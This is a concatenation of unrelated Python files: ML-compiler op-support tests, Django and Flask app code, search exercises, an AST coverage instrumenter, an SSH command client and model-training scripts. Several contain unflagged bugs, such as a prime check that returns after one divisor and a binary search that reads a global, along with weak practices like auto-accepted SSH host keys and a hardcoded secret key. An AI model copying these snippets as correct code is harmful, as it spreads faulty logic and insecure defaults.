X = XLayer(
type=["Conv2DTranspose"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
"channels": [4, 2],
"groups": 1,
},
)
assert conv2d_transpose_op_support(X, [], [])
X = XLayer(
type=["Conv2DTranspose"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
"channels": [2570, 2],
"groups": 1,
},
)
assert not conv2d_transpose_op_support(X, [], [])
def test_dpuv2_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import dpu_op_support
X = XLayer(
type=["DPU"],
name="layer1",
shapes=[[-1, 2, 4, 4], [-1, 1, 4, 4]],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert dpu_op_support(X, [], [])
def test_eltwise_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import eltwise_op_support
X = XLayer(
type=["Eltwise"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert eltwise_op_support(X, [], [])
def test_pad_pooling_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import pad_op_support
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [2, 2], [2, 2]]},
)
tX = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [3, 3],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
},
)
assert pad_op_support(X, [], [tX])
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [5, 2], [5, 2]]},
)
tX = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [3, 3],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
},
)
assert not pad_op_support(X, [], [tX])
def test_pad_convolution_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import pad_op_support
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [1, 1], [1, 1]]},
)
tX = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
"channels": [4, 2],
"groups": 1,
},
)
assert pad_op_support(X, [], [tX])
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [2, 2], [2, 2]]},
)
tX = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
"channels": [4, 2],
"groups": 1,
},
)
assert not pad_op_support(X, [], [tX])
def test_pooling_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import pooling_op_support
X = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [3, 3],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
},
)
assert pooling_op_support(X, [], [])
X = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
},
)
assert not pooling_op_support(X, [], [])
def test_mean_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import mean_op_support
X = XLayer(
type=["Mean"],
name="layer1",
shapes=[-1, 2, 1, 1],
sizes=[2],
bottoms=[],
tops=[],
targets=[],
attrs={"axes": [2, 3], "keepdims": True, "exclude": False},
)
assert mean_op_support(X, [], [])
X = XLayer(
type=["Mean"],
name="layer1",
shapes=[-1, 1, 4, 4],
sizes=[16],
bottoms=[],
tops=[],
targets=[],
attrs={"axes": [1], "keepdims": True, "exclude": False},
)
assert not mean_op_support(X, [], [])
def test_relu_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import relu_op_support
X = XLayer(
type=["ReLU"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert relu_op_support(X, [], [])
def test_relu6_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import relu6_op_support
X = XLayer(
type=["ReLU6"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert relu6_op_support(X, [], [])
def test_scale_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import scale_op_support
X = XLayer(
type=["Scale"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert scale_op_support(X, [], [])
X = XLayer(
type=["Scale"],
name="layer1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert not scale_op_support(X, [], [])
|
from django.conf.urls import url
from .views import checkout, checkout_buy_app, thank_you
urlpatterns = [
url(r'^$', checkout, name = 'checkout'),
url(r'^buy-app$', checkout_buy_app, name = 'checkout-app'),
url(r'^thank-you$', thank_you, name = 'thank-you'),
]
|
'''Auto-creates the database'''
from cfg import CONNECTION_STRING
from db import setup_db, populate
setup_db(CONNECTION_STRING)
populate(CONNECTION_STRING)
|
def bin_search(arr, target, kind="<="):
assert kind in ["<=", ">="]
if kind == "<=":
comp = lambda a, b: a <= b
else:
comp = lambda a, b: a < b
l = 0
r = len(a) - 1
while l < r - 1:
m = (l + r) // 2
if comp(a[m], target):
l = m
else:
r = m
if kind == "<=":
return arr[l]
else:
return arr[r]
def nearest(arr, target):
nearest_le = bin_search(arr, target, "<=")
nearest_ge = bin_search(arr, target, ">=")
if nearest_ge - target < target - nearest_le:
return nearest_ge
else:
return nearest_le
_ = input()
a = [int(x) for x in input().split()]
a = [float("-Infinity")] + a + [float("+Infinity")]
for target in map(int, input().split()):
print(nearest(a, target))
|
import os
def check_dependencies():
pass
def make_directories():
try:
os.mkdir("output")
except:
print ("Unable to make directory 'output', it may already exist.")
try:
os.mkdir("temp")
except:
print ("Unable to make directory 'temp', it may already exist.")
|
#!/usr/bin/python3
import sys
import paramiko
import time
#print(sys.argv)
if len(sys.argv) != 4:
print("sudo apt install python3-pip")
print("pip3 install paramiko")
print("Usage: %s host port user" %sys.argv[0])
print(" %s 1.1.1.1 22 admin" %sys.argv[0])
exit()
host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passwd = input("password: ")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, port, user, passwd, timeout=10)
print("%s@%s>" %(user, host), end=' ')
sys.stdout.flush()
except paramiko.AuthenticationException:
print("[!] Authentication failed")
except Exception:
print("[!] Connection Failed")
except paramiko.SSHException:
print("[!] Unable to establish SSH connection: %s"%(sshException))
while True:
input_cmd = sys.stdin.readline()
stdin, stdout, stderr = ssh.exec_command(input_cmd)
channel = stdout.channel
ret = channel.recv_exit_status()
if ret == 0:
print(stdout.read().decode())
else:
print(stderr.read().decode())
print("%s@%s>" %(user, host), end=' ')
sys.stdout.flush()
ssh.close()
|
def binary_search(array, infi, supr, x):
if supr >= infi:
middle = (supr + infi) // 2
if array[middle] == x:
return middle
elif array[middle] > x:
return binary_search(array, infi, middle - 1, x)
else:
return binary_search(array, middle + 1, supr, x)
arr = [6, 54, 34, 78, 1, 4, 80]
arr.sort()
search = 78
result = binary_search(arr, 0, len(arr) - 1, search)
print('The index of element is', result) |
from typing import List
from BaseClasses.Proposition import Proposition
from PredicateLogic.Existent import Existent
from PredicateLogic.Quantifier import Quantifier
class PredicatedProposition(Proposition):
"""description of class"""
subProposition = None
existents = List[Existent]
quant : Quantifier
|
# -*- coding: utf-8 -*-
# django imports
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
# rewriters imports
from registration.backends.simple import SimpleBackend
from registration import signals
from registration.forms import RegistrationFormUniqueEmail
from registration.forms import attrs_dict
class InactiveSimpleBackend(SimpleBackend):
"""
This backend simply creates inactive user.
"""
def register(self, request, **kwargs):
username, email, password = kwargs['username'], kwargs['email'], kwargs['password1']
new_user = User.objects.create_user(username, email, password)
new_user.is_active = False
new_user.save()
signals.user_registered.send(sender=self.__class__,
user=new_user,
request=request)
return new_user
class InactiveProfileRegisterBackend(SimpleBackend):
"""
Backend to register inactive user with filled extra information.
"""
def register(self, request, **kwargs):
k = kwargs
new_user = User.objects.create_user(k['username'], k['email'], k['password1'])
new_user.is_active = False
new_user.first_name = k['first_name']
new_user.last_name = k['last_name']
new_user.save()
profile = new_user.profile
profile.phone = k['phone']
profile.save()
signals.user_registered.send(sender=self.__class__,
user=new_user,
request=request)
return new_user
class RegistrationFormExtraInfo(RegistrationFormUniqueEmail):
""" Form to make users fill more information during registration.
"""
first_name = forms.CharField(
max_length=30,
widget=forms.TextInput(attrs=attrs_dict),
label="Имя",
)
last_name = forms.CharField(
max_length=30,
widget=forms.TextInput(attrs=attrs_dict),
label="Фамилия",
)
phone = forms.CharField(
max_length=20,
widget=forms.TextInput(attrs=attrs_dict),
label="Телефон",
) |
from .type import POSSIBLE_TYPES
import itertools
import ast
import astor
class Profiler(ast.NodeTransformer):
def __init__(self):
super()
self.branches = dict()
self.branch_id = 1
self.current_lineno = None
self.line_and_vars = dict()
def visit_predicate(self, expr_node, depth=0):
bid_multiplier = -1 if depth > 0 else 1
if isinstance(expr_node, ast.Compare):
if len(expr_node.ops) > 1:
left_node = ast.Compare(
left=expr_node.left,
ops=expr_node.ops[:-1],
comparators=expr_node.comparators[:-1])
else:
left_node = expr_node.left
expr_node = ast.Call(
func=ast.Attribute(
value=ast.Name(id='covw', ctx=ast.Load()),
attr='comparison',
ctx=ast.Load()),
args=[
ast.Num(n=bid_multiplier * self.branch_id),
ast.Num(n=depth),
ast.Str(s=expr_node.ops[-1].__class__.__name__), left_node,
expr_node.comparators[-1]
],
keywords=[])
elif isinstance(expr_node, ast.BoolOp):
for i, value in enumerate(expr_node.values):
expr_node.values[i] = self.visit_predicate(value, depth + 1)
expr_node = ast.Call(
func=ast.Attribute(
value=ast.Name(id='covw', ctx=ast.Load()),
attr='boolop',
ctx=ast.Load()),
args=[
ast.Num(n=bid_multiplier * self.branch_id),
ast.Num(n=depth),
ast.Str(s=expr_node.op.__class__.__name__),
ast.List(elts=expr_node.values, ctx=ast.Load())
],
keywords=[])
elif isinstance(expr_node, ast.UnaryOp) and isinstance(
expr_node.op, ast.Not):
expr_node = ast.Call(
func=ast.Attribute(
value=ast.Name(id='covw', ctx=ast.Load()),
attr='unaryop',
ctx=ast.Load()),
args=[
ast.Num(n=bid_multiplier * self.branch_id),
ast.Num(n=depth),
ast.Str(s=expr_node.op.__class__.__name__),
self.visit_predicate(expr_node.operand, depth + 1)
],
keywords=[])
elif isinstance(expr_node, ast.Name) or isinstance(
expr_node, ast.Call):
expr_node = ast.Call(
func=ast.Attribute(
value=ast.Name(id='covw', ctx=ast.Load()),
attr='value',
ctx=ast.Load()),
args=[
ast.Num(n=bid_multiplier * self.branch_id),
ast.Num(n=depth), expr_node
],
keywords=[])
else:
raise Exception("Unsupported Branch Predicate")
return expr_node
def visit_branch_node(self, node):
expr_node = node.test
expr_node = self.visit_predicate(expr_node, depth=0)
self.branches[node] = self.branch_id
self.branch_id += 1
node.test = expr_node
self.generic_visit(node)
return ast.fix_missing_locations(node)
def visit_If(self, node):
return self.visit_branch_node(node)
def visit_While(self, node):
return self.visit_branch_node(node)
def visit_For(self, node):
iter_node = ast.Call(
func=ast.Attribute(
value=ast.Name(id='covw', ctx=ast.Load()),
attr='iter',
ctx=ast.Load()),
args=[ast.Num(n=self.branch_id), ast.Num(n=0), node.iter],
keywords=[])
self.branches[node] = self.branch_id
self.branch_id += 1
node.iter = iter_node
self.generic_visit(node)
return ast.fix_missing_locations(node)
def collect_var_names(self, node):
var_names = set()
def visit_all_attr(node):
if hasattr(node, 'lineno'):
self.current_lineno = node.lineno
if not hasattr(node, '__dict__'):
return
if isinstance(node, ast.Name):
self.line_and_vars[
self.current_lineno] = self.line_and_vars.get(
self.current_lineno, set())
self.line_and_vars[self.current_lineno].add(node.id)
return
node_vars = vars(node)
for k in node_vars:
if isinstance(node_vars[k], list):
for stmt in node_vars[k]:
visit_all_attr(stmt)
else:
visit_all_attr(node_vars[k])
visit_all_attr(node)
return self.line_and_vars
def collect_constants(self, node):
def add_constant(t, value):
assert t in self.constants
if not value in self.constants[t]:
self.constants[t].append(value)
return
self.constants = dict()
for t in POSSIBLE_TYPES:
self.constants[t] = list()
def visit_all_attr(node):
if not hasattr(node, '__dict__'):
return
if isinstance(node, ast.Num):
if isinstance(node.n, int):
add_constant(int, node.n)
add_constant(float, node.n)
elif isinstance(node.n, float):
add_constant(float, node.n)
return
elif isinstance(node, ast.Str):
add_constant(str, node.s)
return
elif isinstance(node, ast.List):
add_constant(list, eval(compile(ast.Expression(body=node), '', mode='eval')))
return
elif isinstance(node, ast.Tuple):
add_constant(tuple, eval(compile(ast.Expression(body=node), '', mode='eval')))
return
node_vars = vars(node)
for k in node_vars:
if isinstance(node_vars[k], list):
for stmt in node_vars[k]:
visit_all_attr(stmt)
else:
visit_all_attr(node_vars[k])
visit_all_attr(node)
return self.constants
def instrument(self, sourcefile, inst_sourcefile, function):
def get_source(path):
with open(path) as source_file:
return source_file.read()
source = get_source(sourcefile)
root = ast.parse(source)
# Insert 'import covgen.wrapper as covw' in front of the file
import_node = ast.Import(
names=[ast.alias(name='covgen.wrapper', asname='covw')])
root.body.insert(0, import_node)
ast.fix_missing_locations(root)
function_node = None
for stmt in root.body:
if isinstance(stmt, ast.FunctionDef) and stmt.name == function:
function_node = stmt
break
assert function_node
self.collect_constants(function_node)
self.visit(function_node)
total_branches = {
k: None
for k in list(
itertools.product(range(1, self.branch_id), [True, False]))
}
with open(inst_sourcefile, 'w') as instrumented:
instrumented.write(astor.to_source(root))
inst_source = get_source(inst_sourcefile)
root = ast.parse(inst_source)
inst_function_node = None
for stmt in root.body:
if isinstance(stmt, ast.FunctionDef) and stmt.name == function:
inst_function_node = stmt
break
assert inst_function_node
self.collect_var_names(inst_function_node)
return function_node, total_branches
|
from flask import Flask, render_template, redirect, request, session
app = Flask(__name__)
app.secret_key = "Keep it secret, keep it safe"
@app.route("/")
def index():
return render_template("index.html")
@app.route("/process_survey", methods=['POST'])
def process():
session['first_name'] = request.form['first_name']
session['dojo_location'] = request.form['dojo_location']
session['fav_language'] = request.form['fav_language']
session['comment'] = request.form['comment']
return redirect("/result")
@app.route("/result")
def display():
return render_template(
"display.html",
first_name = session['first_name'],
dojo_location = session['dojo_location'],
fav_language = session['fav_language'],
comment = session['comment']
)
if __name__=="__main__":
app.run(debug=True) |
from django.shortcuts import render, redirect
from .models import Task
from .forms import TaskForm
def index(request):
count = Task.objects.all().count()
return render(request, "main/index.html", {'title': 'Главная страница сайта', 'count': count})
def task(request):
tasks = Task.objects.order_by('-id')
return render(request, "main/task.html", {'title': 'Список заданий', 'tasks': tasks})
def create(request):
error = ''
if request.method == 'POST':
form = TaskForm(request.POST)
if form.is_valid():
form.save()
return redirect('task')
else:
error = 'Форма была неверной'
form = TaskForm()
context = {
'form': form,
'error': error
}
return render(request, "main/create.html", context) |
#!/bin/env python
# Cap.6, p.144
alien_0 = {'x_position': 0, 'y_position': 25, 'speed': 'medium'}
# Mover alienigena de acordo com a velocidade.
if alien_0['speed'] == 'slow':
x_increment = 1
elif alien_0['speed'] == 'medium':
x_increment = 2
else:
x_increment = 3
# A nova posicao é a posicao antiga somada ao incremento.
alien_0['x_position'] += x_increment
print('Nova posiçao: ' + str(alien_0['x_position']))
|
# Generated by Django 3.0.8 on 2020-10-12 08:22
from django.db import migrations, models
def apply_migration(apps, schema_editor):
Group = apps.get_model('auth', 'Group')
Group.objects.bulk_create([
Group(name='general_user'),
Group(name='admin'),
])
def revert_migration(apps, schema_editor):
Group = apps.get_model('auth', 'Group')
Group.objects.filter(
name__in=[
'general_user',
'admin',
]
).delete()
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.RunPython(apply_migration, revert_migration)
]
|
import os
os.environ['KMP_DUPLICATE_LIB_OK']='True'
import torch
import torch.nn as nn
from mnist import *
import glob
import cv2
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision import datasets, transforms
import numpy as np
import torchvision
from skimage import io,transform
class ConvNet(nn.Module):
def __init__(self):
super().__init__()
# batch*1*28*28(每次会送入batch个样本,输入通道数1(黑白图像),图像分辨率是28x28)
# 下面的卷积层Conv2d的第一个参数指输入通道数,第二个参数指输出通道数,第三个参数指卷积核的大小
self.conv1 = nn.Conv2d(1, 10, 5) # 输入通道数1,输出通道数10,核的大小5
self.conv2 = nn.Conv2d(10, 20, 3) # 输入通道数10,输出通道数20,核的大小3
# 下面的全连接层Linear的第一个参数指输入通道数,第二个参数指输出通道数
self.fc1 = nn.Linear(20*10*10, 500) # 输入通道数是2000,输出通道数是500
self.fc2 = nn.Linear(500, 10) # 输入通道数是500,输出通道数是10,即10分类
def forward(self,x):
in_size = x.size(0) # 在本例中in_size=512,也就是BATCH_SIZE的值。输入的x可以看成是512*1*28*28的张量。
out = self.conv1(x) # batch*1*28*28 -> batch*10*24*24(28x28的图像经过一次核为5x5的卷积,输出变为24x24)
out = F.relu(out) # batch*10*24*24(激活函数ReLU不改变形状))
out = F.max_pool2d(out, 2, 2) # batch*10*24*24 -> batch*10*12*12(2*2的池化层会减半)
out = self.conv2(out) # batch*10*12*12 -> batch*20*10*10(再卷积一次,核的大小是3)
out = F.relu(out) # batch*20*10*10
out = out.view(in_size, -1) # batch*20*10*10 -> batch*2000(out的第二维是-1,说明是自动推算,本例中第二维是20*10*10)
out = self.fc1(out) # batch*2000 -> batch*500
out = F.relu(out) # batch*500
out = self.fc2(out) # batch*500 -> batch*10
out = F.log_softmax(out, dim=1) # 计算log(softmax(x))
return out
if __name__ =='__main__':
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = torch.load('./MNIST.pth') #加载模型
model = model.to(device)
model.eval() #把模型转为test模式
img = cv2.imread('./handwriteeight.png', 0) #以灰度图的方式读取要预测的图片
img = cv2.resize(img, (28, 28))
height,width=img.shape
dst=np.zeros((height,width),np.uint8)
for i in range(height):
for j in range(width):
dst[i,j]=255-img[i,j]
img = dst
img=np.array(img).astype(np.float32)
img=np.expand_dims(img,0)
img=np.expand_dims(img,0)#扩展后,为[1,1,28,28]
img=torch.from_numpy(img)
img = img.to(device)
output=model(Variable(img))
prob = F.softmax(output, dim=1)
prob = Variable(prob)
prob = prob.cpu().numpy() #用GPU的数据训练的模型保存的参数都是gpu形式的,要显示则先要转回cpu,再转回numpy模式
print(prob) #prob是10个分类的概率
pred = np.argmax(prob) #选出概率最大的一个
print(pred.item())
|
import json
import io
def util_load_json(path):
with io.open(path, mode="r", encoding="utf-8") as f:
return json.loads(f.read())
def util_load_raw(path):
with io.open(path, mode="r", encoding="utf-8") as f:
return f.read()
def test_parse_links():
from ZTAPParseLinks import parse_links
events = util_load_json("test_data/events.json")
output = parse_links(events)
mock_markdown_result = util_load_raw("test_data/output.md")
assert output == mock_markdown_result
|
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
from typing import List
from shop_randomiser import generate_spoiler_log, load_rom_data, write_spoiler_log
import os
ff5_bytes: List[int] = []
def parse_arguments() -> str:
parser: ArgumentParser = ArgumentParser()
parser.add_argument("-i", "--input_rom", type=str, metavar="input_rom", required=True)
args: Namespace = parser.parse_args()
input_rom: str = args.input_rom
if not os.path.isabs(input_rom):
input_rom = os.path.join(os.getcwd(), input_rom)
if not os.path.exists(input_rom):
print("{} does not seem to exist. Aborting.".format(input_rom))
exit(-1)
return input_rom
def main():
input_rom: str = parse_arguments()
global ff5_bytes
ff5_bytes = load_rom_data(rom_path=input_rom)
spoiler_log: List[str] = generate_spoiler_log(ff5_bytes_ro=ff5_bytes)
write_spoiler_log(spoiler_log=spoiler_log, output_file_path="{}.spoiler_log.txt".format(input_rom))
def load_rom_data(rom_path: str) -> List[int]:
assert os.path.isfile(rom_path)
with open(rom_path, "rb") as f:
return [b for b in f.read()]
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Owner'
db.create_table(u'projects_owner', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('first', self.gf('django.db.models.fields.TextField')()),
('last', self.gf('django.db.models.fields.TextField')()),
('details', self.gf('django.db.models.fields.TextField')()),
('public_source_repository', self.gf('django.db.models.fields.URLField')(max_length=200)),
))
db.send_create_signal(u'projects', ['Owner'])
# Adding model 'Project'
db.create_table(u'projects_project', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.TextField')()),
('icon_path', self.gf('django.db.models.fields.TextField')()),
('description', self.gf('django.db.models.fields.TextField')()),
('ranking', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'projects', ['Project'])
# Adding model 'Technology'
db.create_table(u'projects_technology', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('framework', self.gf('django.db.models.fields.TextField')()),
('language', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'projects', ['Technology'])
# Adding M2M table for field project on 'Technology'
m2m_table_name = db.shorten_name(u'projects_technology_project')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('technology', models.ForeignKey(orm[u'projects.technology'], null=False)),
('project', models.ForeignKey(orm[u'projects.project'], null=False))
))
db.create_unique(m2m_table_name, ['technology_id', 'project_id'])
def backwards(self, orm):
# Deleting model 'Owner'
db.delete_table(u'projects_owner')
# Deleting model 'Project'
db.delete_table(u'projects_project')
# Deleting model 'Technology'
db.delete_table(u'projects_technology')
# Removing M2M table for field project on 'Technology'
db.delete_table(db.shorten_name(u'projects_technology_project'))
models = {
u'projects.owner': {
'Meta': {'object_name': 'Owner'},
'details': ('django.db.models.fields.TextField', [], {}),
'first': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last': ('django.db.models.fields.TextField', [], {}),
'public_source_repository': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'projects.project': {
'Meta': {'object_name': 'Project'},
'description': ('django.db.models.fields.TextField', [], {}),
'icon_path': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'ranking': ('django.db.models.fields.IntegerField', [], {})
},
u'projects.technology': {
'Meta': {'object_name': 'Technology'},
'framework': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.TextField', [], {}),
'project': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['projects.Project']", 'symmetrical': 'False'})
}
}
complete_apps = ['projects'] |
import pickle
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
iris = datasets.load_iris()
# Load iris dataset
iris_df = pd.DataFrame(iris.data, columns=iris.feature_names)
# Convert iris to pandas DataFrame
iris_df['target'] = pd.Series(iris.target)
# Format the target column of the DataFrame
y = iris_df['target']
model = KNeighborsClassifier(n_neighbors=1)
# Initialize K-nearest neighbors model with hyperparameter of 3 nearest neighbors
features = iris_df[['petal length (cm)', 'petal width (cm)']]
# Set petal length and petal width as features for the model due to distinct separations for these variables in visualizations
# Mean cross validation score = .973
model.fit(features, y)
# Fit the model
pickle.dump(model, open('api/model.pickle', 'wb'))
# Serialize the model
cross_val_scores = cross_val_score(model, features, y, cv=10)
# Calculate 10-fold cross validation scores
print(cross_val_scores)
# Print array of scores from a 10-fold cross validation
print(np.mean(cross_val_scores)) |
from typing import Callable, Optional, Sequence, Union
import torch
from ignite.metrics import Metric, Precision, Recall
from ignite.metrics.metric import reinit__is_reduced
__all__ = ["FbetaScore"]
class FbetaScore(Metric):
def __init__(
self,
beta: int = 1,
output_transform: Callable = lambda x: x,
average: str = "macro",
is_multilabel: bool = False,
device: Optional[Union[str, torch.device]] = None,
):
self._beta = beta
self._average = average
_average_flag = self._average != "macro"
self._precision = Precision(
output_transform=output_transform,
average=_average_flag,
is_multilabel=is_multilabel,
device=device,
)
self._recall = Recall(
output_transform=output_transform,
average=_average_flag,
is_multilabel=is_multilabel,
device=device,
)
super(FbetaScore, self).__init__(
output_transform=output_transform, device=device
)
@reinit__is_reduced
def reset(self) -> None:
self._precision.reset()
self._recall.reset()
def compute(self) -> torch.Tensor:
precision_val = self._precision.compute()
recall_val = self._recall.compute()
fbeta_val = (
(1.0 + self._beta ** 2)
* precision_val
* recall_val
/ (self._beta ** 2 * precision_val + recall_val + 1e-15)
)
if self._average == "macro":
fbeta_val = torch.mean(fbeta_val).item()
return fbeta_val
@reinit__is_reduced
def update(self, output: Sequence[torch.Tensor]) -> None:
self._precision.update(output)
self._recall.update(output)
|
from spellcheck.spellchecker import SpellingCorrection
import re
class DigitizationParser:
def __init__(self, end_of_essay='# # # # # # #'):
self.end_of_essay = end_of_essay
def _split(self, seq, sep):
chunk = []
for el in seq:
if el == sep:
yield chunk
chunk = []
else:
chunk.append(el)
yield chunk
def _split_string(self, string, sep):
return [''.join(x) for x in self._split(string, sep)]
def _parse_correction(self, essay_metadata):
"""
Parse SpellingCorrection objects out of essay metadata.
essay_metadata: [array of strings] first element is essay number,
second is the essay text, and any elements after that are spelling
corrections
"""
corrections = []
for correction in essay_metadata[2:]:
index, word, correction = list(self._split_string(correction, ','))
index = int(index)
corrections.append(SpellingCorrection(index, word, [correction]))
return corrections
def parse_digitization(self, file_name):
"""
Parse essay text and SpellingCorrection objs out of each digitization.
"""
essays = []
corrections = []
with open(file_name) as data_file:
lines = data_file.read().splitlines()
essays_with_metadata = list(self._split(lines, self.end_of_essay))
essays = []
essay_corrections = []
for e in essays_with_metadata[:-1]:
essay_text = re.sub(r'<([^>]*)>', r'\1', e[1])
essays.append(essay_text)
essay_corrections.append(self._parse_correction(e))
return essays, essay_corrections
def parse_counts(file_name, sep='\t', encoding=None):
"""
Parse frequency counts from file.
Params:
file_name: [string] The path to the file to parse. File should have
lines formatted as <item><sep><count>. For example: "e|i 917"
sep: [string] The separator between fields on a line.
encoding: [string] Type of encoding to use. Ex: 'utf-8'
Returns:
counts: [dict{string, int}] Dict from edit to number of counts
for the edit.
"""
counts = {}
with open(file_name, encoding=encoding) as f:
for line in f:
edit, count = line.split(sep)
counts[edit] = int(count)
return counts
def word_tokenize(sent):
"""
Split sentence into words.
"""
words = []
for word in sent.split():
if (len(word) > 1 and word[-1] in '.?!,'):
words.append(word[:-1])
else:
words.append(word)
return words
|
class Solution:
def removeKdigits(self, num, k):
"""
:type num: str
:type k: int
:rtype: str
"""
if k == len(num):
return '0'
n, i = len(num), 0
stack = []
while i < n:
while k > 0 and stack and stack[-1] > num[i]:
k -= 1
stack.pop()
stack.append(num[i])
i += 1
"""
corner cases like 1111
"""
while k > 0:
k -= 1
stack.pop()
ans = "".join(stack)
return str(int(ans))
print(Solution().removeKdigits("10", 1))
|
#función que reciba 2 enteros y verifique si el 1ero es divisible en el segundo
def divisible(a, b):
if a % b == 0:
return True
else:
return False
def primo(c):
if c != 2:
for i in range(2, c):
if c % i == 0:
return "False"
else:
return "True"
else:
return "True"
def nota(note):
if note >= 75:
return "Excelente"
elif note >= 70 and note < 75:
return "Bueno"
elif note >= 60 and note < 70:
return "Ok"
elif note >= 50 and note < 60:
return "Regular"
elif note >= 45 and note < 50:
return "Mal"
elif note >= 40 and note < 45:
return "Pésimo"
elif note < 40:
return "Perverso"
else:
return "No es una nota válida"
evaluaciones = [83, 75, 74.9, 70, 69.9, 65]
resul = []
for i in evaluaciones:
resul.append(nota(i))
print (resul) |
from django.db import models
from django.core.urlresolvers import reverse
# Create your models here.
class Doctor(models.Model):
name = models.CharField(max_length=200)
age = models.CharField(max_length=200)
gender = models.CharField(max_length=200)
